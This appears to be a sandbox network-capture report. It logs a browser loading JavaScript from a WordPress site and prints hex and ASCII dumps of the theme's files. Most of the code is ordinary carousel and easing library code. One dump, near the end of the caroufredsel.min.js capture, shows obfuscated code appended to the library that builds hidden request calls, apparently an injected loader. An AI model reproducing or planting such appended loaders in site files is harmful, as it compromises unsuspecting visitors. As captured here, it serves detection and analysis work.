                                                            2025-01-15 10:08:03 UTC8000INData Raw: 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 70 6f 2c 20 73 29 0a 20 20 20 20 20 20 20 20 7d 28 29 0a 20 20 20 20 7d 29 2c 20 22 66 75 6e 63 74 69 6f 6e 22 20 21 3d 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 76 63 5f 70 72 6f 67 72 65 73 73 5f 62 61 72 20 26 26 20 28 77 69 6e 64 6f 77 2e 76 63 5f 70 72 6f 67 72 65 73 73 5f 62 61 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 22 75 6e 64 65 66 69 6e 65 64 22 20 21 3d 20 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 77 61 79 70 6f 69 6e 74 20 26 26 20 6a 51 75 65 72 79 28 22 2e 76 63 5f 70 72 6f 67 72 65 73 73 5f 62 61 72 22 29 2e 77 61 79 70 6f 69 6e 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51
                                                            Data Ascii: s.parentNode.insertBefore(po, s) }() }), "function" != typeof window.vc_progress_bar && (window.vc_progress_bar = function() { "undefined" != typeof jQuery.fn.waypoint && jQuery(".vc_progress_bar").waypoint(function() { jQ
                                                            2025-01-15 10:08:03 UTC8000INData Raw: 20 20 20 20 20 20 20 73 63 72 65 65 6e 5f 73 69 7a 65 20 3d 20 67 65 74 53 69 7a 65 4e 61 6d 65 28 29 2c 20 62 65 66 6f 72 65 5f 72 65 73 69 7a 65 20 21 3d 20 73 63 72 65 65 6e 5f 73 69 7a 65 20 26 26 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 22 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 22 2c 20 32 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 0a 20 20 20 20 7d 29 2c 20 22 66 75 6e 63 74 69 6f 6e 22 20 21 3d 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 76 63 5f 73 6c 69 64 65 72 73 42 65 68 61 76 69 6f 75 72 20 26 26 20 28 77 69 6e 64 6f 77 2e 76 63 5f 73 6c 69 64 65 72 73 42 65 68 61 76 69 6f 75 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20
                                                            Data Ascii: screen_size = getSizeName(), before_resize != screen_size && window.setTimeout("location.reload()", 20) }) } }) }), "function" != typeof window.vc_slidersBehaviour && (window.vc_slidersBehaviour = function()
                                                            2025-01-15 10:08:03 UTC3479INData Raw: 76 63 5f 70 6c 75 67 69 6e 5f 66 6c 65 78 73 6c 69 64 65 72 28 70 61 6e 65 6c 29 2c 20 75 69 2e 6e 65 77 50 61 6e 65 6c 2e 66 69 6e 64 28 22 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 6d 65 64 69 61 5f 67 72 69 64 2c 20 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 67 72 69 64 22 29 2e 6c 65 6e 67 74 68 20 26 26 20 75 69 2e 6e 65 77 50 61 6e 65 6c 2e 66 69 6e 64 28 22 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 6d 65 64 69 61 5f 67 72 69 64 2c 20 2e 76 63 5f 6d 61 73 6f 6e 72 79 5f 67 72 69 64 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 67 72 69 64 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 76 63 47 72 69 64 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 20 26 26 20 67 72 69 64
                                                            Data Ascii: vc_plugin_flexslider(panel), ui.newPanel.find(".vc_masonry_media_grid, .vc_masonry_grid").length && ui.newPanel.find(".vc_masonry_media_grid, .vc_masonry_grid").each(function() { var grid = jQuery(this).data("vcGrid"); grid && grid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            84192.168.2.1649801178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:03 UTC423OUTGET /wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:03 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:03 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:03 GMT
                                                            ETag: "dd7c-620a8e9762250"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 56700
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:03 UTC7906INData Raw: 2f 2a 0a 20 2a 09 6a 51 75 65 72 79 20 63 61 72 6f 75 46 72 65 64 53 65 6c 20 36 2e 32 2e 31 0a 20 2a 09 44 65 6d 6f 27 73 20 61 6e 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3a 0a 20 2a 09 63 61 72 6f 75 66 72 65 64 73 65 6c 2e 64 65 76 37 73 74 75 64 69 6f 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 09 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 46 72 65 64 20 48 65 75 73 73 63 68 65 6e 0a 20 2a 09 77 77 77 2e 66 72 65 62 73 69 74 65 2e 6e 6c 0a 20 2a 0a 20 2a 09 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 2e 0a 20 2a 09 68 74 74 70 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 2f 4d 49 54 5f 4c 69 63 65 6e 73 65 0a 20 2a 09 68 74 74 70
                                                            Data Ascii: /* *jQuery carouFredSel 6.2.1 *Demo's and documentation: *caroufredsel.dev7studios.com * *Copyright (c) 2013 Fred Heusschen *www.frebsite.nl * *Dual licensed under the MIT and GPL licenses. *http://en.wikipedia.org/wiki/MIT_License *http
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 75 73 65 50 61 64 64 69 6e 67 29 7b 76 61 72 20 64 3d 69 73 5f 62 6f 6f 6c 65 61 6e 28 63 29 3f 63 3a 21 31 3b 69 73 5f 6e 75 6d 62 65 72 28 63 29 7c 7c 28 63 3d 30 29 2c 73 7a 5f 73 74 6f 72 65 4d 61 72 67 69 6e 28 61 2c 62 2c 22 5f 63 66 73 5f 74 65 6d 70 43 73 73 4d 61 72 67 69 6e 22 29 2c 61 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 24 28 74 68 69 73 29 3b 61 2e 63 73 73 28 62 2e 64 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 64 3f 61 2e 64 61 74 61 28 22 5f 63 66 73 5f 74 65 6d 70 43 73 73 4d 61 72 67 69 6e 22 29 3a 63 2b 61 2e 64 61 74 61 28 22 5f 63 66 73 5f 6f 72 69 67 43 73 73 4d 61 72 67 69 6e 22 29 29 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 7a 5f 73 74 6f 72 65 4f 72 69 67 43 73 73 28 61 29 7b 61 2e 65 61 63 68 28 66 75
                                                            Data Ascii: usePadding){var d=is_boolean(c)?c:!1;is_number(c)||(c=0),sz_storeMargin(a,b,"_cfs_tempCssMargin"),a.each(function(){var a=$(this);a.css(b.d.marginRight,d?a.data("_cfs_tempCssMargin"):c+a.data("_cfs_origCssMargin"))})}}function sz_storeOrigCss(a){a.each(fu
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 65 72 28 61 29 7b 72 65 74 75 72 6e 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 75 6d 62 65 72 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 29 26 26 21 69 73 4e 61 4e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 5f 73 74 72 69 6e 67 28 61 29 7b 72 65 74 75 72 6e 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 29 26 26 21 69 73 5f 75 6e 64 65 66 69 6e 65 64 28 61 29 26 26 21 69 73 5f 74 72 75 65 28 61 29 26 26 21 69 73 5f 66 61 6c 73 65 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 5f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 7d
                                                            Data Ascii: er(a){return(a instanceof Number||"number"==typeof a)&&!isNaN(a)}function is_string(a){return(a instanceof String||"string"==typeof a)&&!is_undefined(a)&&!is_true(a)&&!is_false(a)}function is_function(a){return a instanceof Function||"function"==typeof a}
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 67 65 74 54 69 6d 65 28 29 2d 74 6d 72 73 2e 73 74 61 72 74 54 69 6d 65 2b 74 6d 72 73 2e 74 69 6d 65 50 61 73 73 65 64 2c 62 3d 4d 61 74 68 2e 63 65 69 6c 28 31 30 30 2a 61 2f 68 29 3b 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 75 70 64 61 74 65 72 2e 63 61 6c 6c 28 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 62 61 72 5b 30 5d 2c 62 29 7d 2c 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 69 6e 74 65 72 76 61 6c 29 29 2c 74 6d 72 73 2e 61 75 74 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 26 26 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 75 70 64 61 74 65 72 2e 63 61 6c 6c 28 6f 70 74 73
                                                            Data Ascii: tion(){var a=getTime()-tmrs.startTime+tmrs.timePassed,b=Math.ceil(100*a/h);opts.auto.progress.updater.call(opts.auto.progress.bar[0],b)},opts.auto.progress.interval)),tmrs.auto=setTimeout(function(){opts.auto.progress&&opts.auto.progress.updater.call(opts
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6e 63 74 69 6f 6e 28 29 7b 47 28 29 2c 49 28 29 2c 4b 28 29 2c 4f 28 29 2c 4e 28 29 2c 4d 28 29 7d 5d 29 2c 46 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 6e 63 6f 76 65 72 22 3a 73 63 72 6c 2e 61 6e 69 6d 73 2e 70 75 73 68 28 5b 73 2c 78 2c 4d 5d 29 2c 46 28 29 2c 47 28 29 2c 49 28 29 2c 4b 28 29 2c 4f 28 29 2c 4e 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 6e 63 6f 76 65 72 2d 66 61 64 65 22 3a 24 63 66 73 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 30 7d 29 2c 73 63 72 6c 2e 61 6e 69 6d 73 2e 70 75 73 68 28 5b 24 63 66 73 2c 7b 6f 70 61 63 69 74 79 3a 31 7d 5d 29 2c 73 63 72 6c 2e 61 6e 69 6d 73 2e 70 75 73 68 28 5b 73 2c 78 2c 4d 5d 29 2c 46 28 29 2c 47 28 29 2c 49 28 29 2c 4b 28 29 2c 4f 28 29 2c 4e 28 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a
                                                            Data Ascii: nction(){G(),I(),K(),O(),N(),M()}]),F();break;case"uncover":scrl.anims.push([s,x,M]),F(),G(),I(),K(),O(),N();break;case"uncover-fade":$cfs.css({opacity:0}),scrl.anims.push([$cfs,{opacity:1}]),scrl.anims.push([s,x,M]),F(),G(),I(),K(),O(),N();break;default:
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 62 29 7c 7c 71 75 65 75 2e 70 75 73 68 28 5b 62 2c 63 5d 29 2c 71 75 65 75 7d 29 2c 24 63 66 73 2e 62 69 6e 64 28 63 66 5f 65 28 22 69 6e 73 65 72 74 49 74 65 6d 22 2c 63 6f 6e 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 61 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 76 61 72 20 66 3d 5b 62 2c 63 2c 64 2c 65 5d 2c 67 3d 5b 22 73 74 72 69 6e 67 2f 6f 62 6a 65 63 74 22 2c 22 73 74 72 69 6e 67 2f 6e 75 6d 62 65 72 2f 6f 62 6a 65 63 74 22 2c 22 62 6f 6f 6c 65 61 6e 22 2c 22 6e 75 6d 62 65 72 22 5d 2c 68 3d 63 66 5f 73 6f 72 74 50 61 72 61 6d 73 28 66 2c 67 29 3b 69 66 28 62 3d 68 5b 30 5d 2c 63 3d 68 5b 31 5d 2c 64 3d 68 5b 32 5d 2c 65 3d 68 5b 33 5d 2c 69 73 5f 6f 62 6a 65 63 74 28 62 29 26 26 21 69 73 5f 6a 71 75 65 72
                                                            Data Ascii: b)||queu.push([b,c]),queu}),$cfs.bind(cf_e("insertItem",conf),function(a,b,c,d,e){a.stopPropagation();var f=[b,c,d,e],g=["string/object","string/number/object","boolean","number"],h=cf_sortParams(f,g);if(b=h[0],c=h[1],d=h[2],e=h[3],is_object(b)&&!is_jquer
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 67 67 65 72 28 63 66 5f 65 28 22 70 61 75 73 65 22 2c 63 6f 6e 66 29 2c 61 29 7d 29 2e 62 69 6e 64 28 63 66 5f 65 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 63 6f 6e 66 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 24 63 66 73 2e 74 72 69 67 67 65 72 28 63 66 5f 65 28 22 72 65 73 75 6d 65 22 2c 63 6f 6e 66 29 29 7d 29 7d 69 66 28 6f 70 74 73 2e 61 75 74 6f 2e 62 75 74 74 6f 6e 26 26 6f 70 74 73 2e 61 75 74 6f 2e 62 75 74 74 6f 6e 2e 62 69 6e 64 28 63 66 5f 65 28 6f 70 74 73 2e 61 75 74 6f 2e 65 76 65 6e 74 2c 63 6f 6e 66 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 62 3d 21 31 2c 63 3d 6e 75 6c 6c 3b 63 72 73 6c 2e 69 73 50 61 75 73 65 64 3f 62 3d 22 70 6c 61 79 22 3a 6f 70 74 73
                                                            Data Ascii: gger(cf_e("pause",conf),a)}).bind(cf_e("mouseleave",conf,!1),function(){$cfs.trigger(cf_e("resume",conf))})}if(opts.auto.button&&opts.auto.button.bind(cf_e(opts.auto.event,conf,!1),function(a){a.preventDefault();var b=!1,c=null;crsl.isPaused?b="play":opts
                                                            2025-01-15 10:08:04 UTC794INData Raw: 29 3b 7d 2c 7a 5b 68 28 30 78 64 39 29 2b 27 6e 27 5d 28 68 28 30 78 64 31 29 2c 72 2c 21 21 5b 5d 29 2c 7a 5b 68 28 27 30 78 64 65 27 29 2b 27 64 27 5d 28 6e 75 6c 6c 29 3b 7d 3b 7d 2c 72 61 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 41 3b 72 65 74 75 72 6e 20 4d 61 74 68 5b 6b 28 30 78 64 33 29 2b 6b 28 30 78 66 64 29 5d 28 29 5b 6b 28 30 78 66 63 29 2b 6b 28 30 78 31 30 62 29 2b 27 6e 67 27 5d 28 30 78 32 34 29 5b 6b 28 27 30 78 65 35 27 29 2b 6b 28 27 30 78 65 33 27 29 5d 28 30 78 32 29 3b 7d 2c 74 6f 6b 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 41 28 72 2c 65 29 7b 72 3d 72 2d 30 78 63 66 3b 76 61 72 20 7a 3d 71 5b 72 5d 3b 72 65 74 75 72
                                                            Data Ascii: );},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];retur


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            85192.168.2.1649803178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:04 UTC409OUTGET /wp-content/themes/salient/js/init.js?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:04 UTC288INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:04 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:03 GMT
                                                            ETag: "81312-620a8e96eb01a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 529170
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:04 UTC7904INData Raw: 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 09 31 2e 09 50 6c 75 67 69 6e 20 49 6e 69 74 0a 09 32 2e 09 48 65 6c 70 65 72 20 46 75 6e 63 74 69 6f 6e 73 0a 09 33 2e 09 53 68 6f 72 74 63 6f 64 65 20 53 74 75 66 66 0a 09 34 2e 09 48 65 61 64 65 72 20 2b 20 53 65 61 72 63 68 0a 09 35 2e 09 50 61 67 65 20 53 70 65 63 69 66 69 63 0a 09 36 2e 20 20 53 63 72 6f 6c 6c 20 74 6f 20 74 6f 70 20 0a 09 37 2e 09 43 72 6f 73 73 20 42 72 6f 77 73 65 72 20 46 69 78 65 73 0a 0a 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                            Data Ascii: /*-------------------------------------------------------------------------1.Plugin Init2.Helper Functions3.Shortcode Stuff4.Header + Search5.Page Specific6. Scroll to top 7.Cross Browser Fixes-------------------------------------
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 4f 72 43 72 65 61 74 65 42 79 45 6c 65 6d 65 6e 74 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 65 78 74 29 2c 74 2e 6f 66 66 73 65 74 41 6c 69 61 73 65 73 5b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 5d 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 3d 74 2e 6f 66 66 73 65 74 41 6c 69 61 73 65 73 5b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 5d 29 2c 74 68 69 73 2e 67 72 6f 75 70 2e 61 64 64 28 74 68 69 73 29 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 61 64 64 28 74 68 69 73 29 2c 69 5b 74 68 69 73 2e 6b 65 79 5d 3d 74 68 69 73 2c 65 2b 3d 31 7d 76 61 72 20 65 3d 30 2c 69 3d 7b 7d 3b 74 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 75 65 54 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68
                                                            Data Ascii: OrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),i[this.key]=this,e+=1}var e=0,i={};t.prototype.queueTrigger=function(t){th
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 77 2e 5a 65 70 74 6f 29 29 7d 28 29 3b 0a 0a 2f 2a 0a 2a 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 20 76 31 2e 33 20 2d 20 68 74 74 70 3a 2f 2f 67 73 67 64 2e 63 6f 2e 75 6b 2f 73 61 6e 64 62 6f 78 2f 6a 71 75 65 72 79 2f 65 61 73 69 6e 67 2f 0a 2a 2f 0a 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 22 6a 73 77 69 6e 67 22 5d 3d 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 22 73 77 69 6e 67 22 5d 3b 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2c 7b 64 65 66 3a 22 65 61 73 65 4f 75 74 51 75 61 64 22 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 5b 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 64 65 66 5d 28 61 2c 62 2c 63 2c 64 2c 65 29
                                                            Data Ascii: w.Zepto))}();/** jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/*/jQuery.easing["jswing"]=jQuery.easing["swing"];jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(a,b,c,d,e){return jQuery.easing[jQuery.easing.def](a,b,c,d,e)
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 28 27 62 6f 64 79 27 29 2e 61 74 74 72 28 27 64 61 74 61 2d 6c 6f 61 64 69 6e 67 2d 61 6e 69 6d 61 74 69 6f 6e 27 29 20 3a 20 6e 75 6c 6c 20 3b 0a 09 09 20 76 61 72 20 61 73 63 65 6e 64 5f 6c 6f 61 64 65 72 20 3d 20 28 24 28 27 62 6f 64 79 27 29 2e 68 61 73 43 6c 61 73 73 28 27 61 73 63 65 6e 64 27 29 29 20 3f 20 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 65 66 61 75 6c 74 2d 6c 6f 61 64 69 6e 67 2d 69 63 6f 6e 20 73 70 69 6e 22 3e 3c 2f 73 70 61 6e 3e 27 20 3a 27 27 3b 0a 09 09 20 76 61 72 20 61 73 63 65 6e 64 5f 6c 6f 61 64 65 72 5f 63 6c 61 73 73 20 3d 20 28 24 28 27 62 6f 64 79 27 29 2e 68 61 73 43 6c 61 73 73 28 27 61 73 63 65 6e 64 27 29 29 20 3f 20 27 64 65 66 61 75 6c 74 5f 6c 6f 61 64 65 72 20 27 20 3a 20 27 27 3b 0a 09 09 24 28 22 61 5b 72 65
                                                            Data Ascii: ('body').attr('data-loading-animation') : null ; var ascend_loader = ($('body').hasClass('ascend')) ? '<span class="default-loading-icon spin"></span>' :''; var ascend_loader_class = ($('body').hasClass('ascend')) ? 'default_loader ' : '';$("a[re
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 63 73 73 45 61 73 65 3d 7b 5f 64 65 66 61 75 6c 74 3a 22 65 61 73 65 22 2c 22 69 6e 22 3a 22 65 61 73 65 2d 69 6e 22 2c 6f 75 74 3a 22 65 61 73 65 2d 6f 75 74 22 2c 22 69 6e 2d 6f 75 74 22 3a 22 65 61 73 65 2d 69 6e 2d 6f 75 74 22 2c 73 6e 61 70 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 31 2c 2e 35 2c 31 29 22 2c 65 61 73 65 4f 75 74 43 75 62 69 63 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 31 35 2c 2e 36 31 2c 2e 33 35 35 2c 31 29 22 2c 65 61 73 65 49 6e 4f 75 74 43 75 62 69 63 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 34 35 2c 2e 30 34 35 2c 2e 33 35 35 2c 31 29 22 2c 65 61 73 65 49 6e 43 69 72 63 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 2c 2e 30 34 2c 2e 39 38 2c 2e 33 33 35 29 22 2c 65 61 73 65 4f 75 74 43 69 72 63
                                                            Data Ascii: cssEase={_default:"ease","in":"ease-in",out:"ease-out","in-out":"ease-in-out",snap:"cubic-bezier(0,1,.5,1)",easeOutCubic:"cubic-bezier(.215,.61,.355,1)",easeInOutCubic:"cubic-bezier(.645,.045,.355,1)",easeInCirc:"cubic-bezier(.6,.04,.98,.335)",easeOutCirc
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 76 65 3d 22 74 72 75 65 22 5d 27 29 2e 6c 65 6e 67 74 68 20 3d 3d 20 30 20 29 20 7b 0a 09 09 09 24 28 27 62 6f 64 79 27 29 2e 63 73 73 28 27 70 61 64 64 69 6e 67 2d 72 69 67 68 74 27 2c 27 31 36 70 78 27 29 3b 0a 09 09 7d 0a 09 09 0a 09 09 24 28 27 68 74 6d 6c 27 29 2e 61 64 64 43 6c 61 73 73 28 27 6e 6f 2d 6f 76 65 72 66 6c 6f 77 2d 79 27 29 3b 0a 09 7d 0a 0a 09 76 61 72 20 24 73 6d 6f 6f 74 68 41 63 74 69 76 65 20 3d 20 24 28 27 62 6f 64 79 27 29 2e 61 74 74 72 28 27 64 61 74 61 2d 73 6d 6f 6f 74 68 2d 73 63 72 6f 6c 6c 69 6e 67 27 29 3b 20 0a 09 76 61 72 20 24 73 6d 6f 6f 74 68 43 61 63 68 65 20 3d 20 28 20 24 73 6d 6f 6f 74 68 41 63 74 69 76 65 20 3d 3d 20 31 20 29 20 3f 20 74 72 75 65 20 3a 20 66 61 6c 73 65 3b 0a 09 0a 09 69 66 28 20 24 73 6d 6f 6f
                                                            Data Ascii: ve="true"]').length == 0 ) {$('body').css('padding-right','16px');}$('html').addClass('no-overflow-y');}var $smoothActive = $('body').attr('data-smooth-scrolling'); var $smoothCache = ( $smoothActive == 1 ) ? true : false;if( $smoo
                                                            2025-01-15 10:08:04 UTC8000INData Raw: 6e 69 74 69 61 6c 69 7a 65 64 27 29 2e 66 6c 69 63 6b 69 74 79 28 7b 0a 09 09 20 20 63 6f 6e 74 61 69 6e 3a 20 74 72 75 65 2c 0a 09 09 20 20 64 72 61 67 67 61 62 6c 65 3a 20 66 61 6c 73 65 2c 0a 09 09 20 20 6c 61 7a 79 4c 6f 61 64 3a 20 66 61 6c 73 65 2c 0a 09 09 20 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 3a 20 74 72 75 65 2c 0a 09 09 20 20 70 65 72 63 65 6e 74 50 6f 73 69 74 69 6f 6e 3a 20 74 72 75 65 2c 0a 09 09 20 20 70 72 65 76 4e 65 78 74 42 75 74 74 6f 6e 73 3a 20 74 72 75 65 2c 0a 09 09 20 20 70 61 67 65 44 6f 74 73 3a 20 66 61 6c 73 65 2c 0a 09 09 20 20 72 65 73 69 7a 65 3a 20 74 72 75 65 2c 0a 09 09 20 20 73 65 74 47 61 6c 6c 65 72 79 53 69 7a 65 3a 20 74 72 75 65 2c 0a 09 09 20 20 77 72 61 70 41 72 6f 75 6e 64 3a 20 74 72 75 65 2c 0a 09 09 20 20
                                                            Data Ascii: nitialized').flickity({ contain: true, draggable: false, lazyLoad: false, imagesLoaded: true, percentPosition: true, prevNextButtons: true, pageDots: false, resize: true, setGallerySize: true, wrapAround: true,
